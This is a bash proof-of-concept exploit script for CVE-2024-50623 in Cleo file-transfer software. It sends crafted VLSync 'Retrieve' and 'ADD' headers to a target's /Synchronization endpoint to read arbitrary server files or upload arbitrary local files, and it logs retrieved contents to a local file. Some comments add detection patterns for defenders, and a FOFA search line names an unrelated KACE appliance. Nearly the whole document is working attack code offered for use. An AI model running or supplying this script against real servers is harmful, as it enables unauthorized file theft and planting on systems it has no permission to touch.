cve-2024-50623.sh
# CVE-2024-50623 POC - Cleo Unrestricted file upload and download
# FOFA body="packages/partnerlogos/userportal_logo" && title="KACE Systems Management Appliance Service Center"
# Medium https://medium.com/@verylazytech
# Github https://github.com/verylazytech
# My Shop https://buymeacoffee.com/verylazytech/extras
# https://www.verylazytech.com
#!/usr/bin/env bash
# Print the tool's ASCII-art banner to stdout.
# The here-document delimiter is quoted ('EOF'), so the backslashes, backticks
# and quotes inside the art are emitted literally, with no expansion.
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ _ _ ____ ___ __ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | ___| / _ \ / /_|___ \|___ /
| | \ \ / /| _| __) | | | |__) | || |_ |___ \| | | | '_ \ __) | |_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| ___) | |_| | (_) / __/ ___) |
\____| \_/ |_____| |_____\___/_____| |_| |____/ \___/ \___/_____|____/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Show the banner, then enable errexit so that an unhandled command failure in
# the rest of the script aborts the run.
banner
set -o errexit
# Print the command-line synopsis and terminate the script.
# Outputs:   one usage line on stdout
# Returns:   does not return; exits with status 1
usage() {
  printf '%s\n' "Usage: $0 -t <target_url> -a <read|write> -f <file_path> [--w <local_file_to_write>] [--proxy <proxy_url>]"
  exit 1
}
# Parse command-line options. Each recognised flag consumes the flag itself and
# the value after it; any other argument prints the usage text and exits.
while [ "$#" -gt 0 ]; do
  case "$1" in
    -t)      TARGET="$2" ;;
    -a)      ACTION="$2" ;;
    -f)      WHERE="$2" ;;
    -w)      WHAT="$2" ;;
    --proxy) PROXY="$2" ;;
    *)       usage ;;
  esac
  shift
  shift
done

# -t, -a and -f are mandatory.
if ! { [ -n "$TARGET" ] && [ -n "$ACTION" ] && [ -n "$WHERE" ]; }; then
  usage
fi

# The target only has to start with http:// or https://; nothing else about
# the URL is checked here.
printf '%s\n' "$TARGET" | grep -qE '^https?://' || {
  echo "[ERROR] Invalid URL format for target"
  exit 1
}

# For the write action the local source must be an existing regular file.
if [ "$ACTION" = "write" ]; then
  if [ ! -f "$WHAT" ]; then
    echo "[ERROR] File $WHAT does not exist or is not readable"
    exit 1
  fi
fi

# Drop a single trailing slash so "$TARGET/Synchronization" has no double slash.
TARGET="${TARGET%/}"
printf "\033[0;32mAttempting to exploit CVE-2024-50623...\033[0m\n"
# Emit one timestamped log line and append a copy of it to exploit.log.
# Arguments: $1 - severity label (e.g. INFO, ERROR)
#            $2 - message text
# Outputs:   "[YYYY-MM-DD HH:MM:SS] [level] message" on stdout; the same line
#            is appended to exploit.log in the current working directory
log() {
  local level="$1" message="$2"
  printf '[%s] [%s] %s\n' "$(date +'%Y-%m-%d %H:%M:%S')" "$level" "$message" \
    | tee -a exploit.log
}
# Request "<base>/Synchronization" and print, from curl's output, the run of
# non-space characters that follows the first "/" after "Server: ".
# Globals:   PROXY (read) - optional proxy URL, handed to curl via --proxy
# Arguments: $1 - base URL of the target
# Outputs:   the matched text on stdout; nothing when there is no match
# Returns:   grep's exit status (non-zero when nothing matched)
# Note: curl runs with -k, so the server's TLS certificate is not verified.
extract_version() {
  local -a curl_args=(-s -k)
  if [ -n "$PROXY" ]; then
    curl_args+=(--proxy "$PROXY")
  fi
  curl "${curl_args[@]}" "$1/Synchronization" | grep -oP 'Server: .*?/\K[^ ]+'
}
# Send the "Retrieve" synchronization request for a path and show the reply.
# Globals:   PROXY (read) - optional proxy URL, handed to curl via --proxy
# Arguments: $1 - base URL of the target
#            $2 - path placed in the header's path= field
# Outputs:   response body on stdout and appended to exploit.log, followed by
#            a log line naming the path
# Review notes: the response may hold the contents of the requested file, so
#   exploit.log should be handled as sensitive engagement data. On the server
#   side this request is recognisable by a VLSync header whose value begins
#   "Retrieve;" and carries a caller-chosen path= field, sent to
#   /Synchronization; that is the pattern to alert on until the vendor fix for
#   CVE-2024-50623 is applied.
read_file() {
  local version_token
  # The lookup status is ignored; when nothing was found the header is sent
  # with an empty v= field.
  version_token=$(extract_version "$1") || true
  local sync_header="VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=${version_token};a=1337;po=1337;s=True;b=False;pp=1337;path=$2"

  local -a curl_args=(-s -k)
  if [ -n "$PROXY" ]; then
    curl_args+=(--proxy "$PROXY")
  fi

  # Show the response and keep a copy in the log file, then record the action.
  curl "${curl_args[@]}" -H "$sync_header" "$1/Synchronization" | tee -a exploit.log
  log INFO "Reading file: $2"
}
# Send the "ADD" synchronization request, with a local file as the request
# body, and show the reply.
# Globals:   PROXY (read) - optional proxy URL, handed to curl via --proxy
# Arguments: $1 - base URL of the target
#            $2 - path placed in the header's path= field
#            $3 - local file whose bytes are sent unmodified as the body
# Outputs:   response body on stdout and appended to exploit.log, followed by
#            a log line naming the path and the local file
# Review notes: on the server side this request is recognisable by a VLSync
#   header whose value begins "ADD;" and carries a caller-chosen path= field,
#   sent with a body to /Synchronization; that is the pattern to alert on until
#   the vendor fix for CVE-2024-50623 is applied.
write_file() {
  local version_token
  # The lookup status is ignored; when nothing was found the header is sent
  # with an empty v= field.
  version_token=$(extract_version "$1") || true
  local sync_header="VLSync: ADD;l=Ab1234-RQ0258;n=VLTrader;v=${version_token};a=1337;po=1337;s=True;b=False;pp=1337;path=$2"

  local -a curl_args=(-s -k)
  if [ -n "$PROXY" ]; then
    curl_args+=(--proxy "$PROXY")
  fi

  # Show the response and keep a copy in the log file, then record the action.
  curl "${curl_args[@]}" -H "$sync_header" --data-binary "@$3" "$1/Synchronization" | tee -a exploit.log
  log INFO "Writing file: $2 with data from $3"
}
# Dispatch on the requested action; anything other than read or write is
# logged as an error and ends in the usage text.
if [ "$ACTION" = "read" ]; then
  log INFO "Action: READ. Target: $TARGET, File: $WHERE"
  read_file "$TARGET" "$WHERE"
elif [ "$ACTION" = "write" ]; then
  # The write action needs a local source file.
  if [ -z "$WHAT" ]; then
    log ERROR "--what is required for write action"
    exit 1
  fi
  log INFO "Action: WRITE. Target: $TARGET, File: $WHERE, Data: $WHAT"
  write_file "$TARGET" "$WHERE" "$WHAT"
else
  log ERROR "Invalid action"
  usage
fi

# Closing status line.
printf "\n\033[1;33m--- Exploit Complete ---\033[0m\n"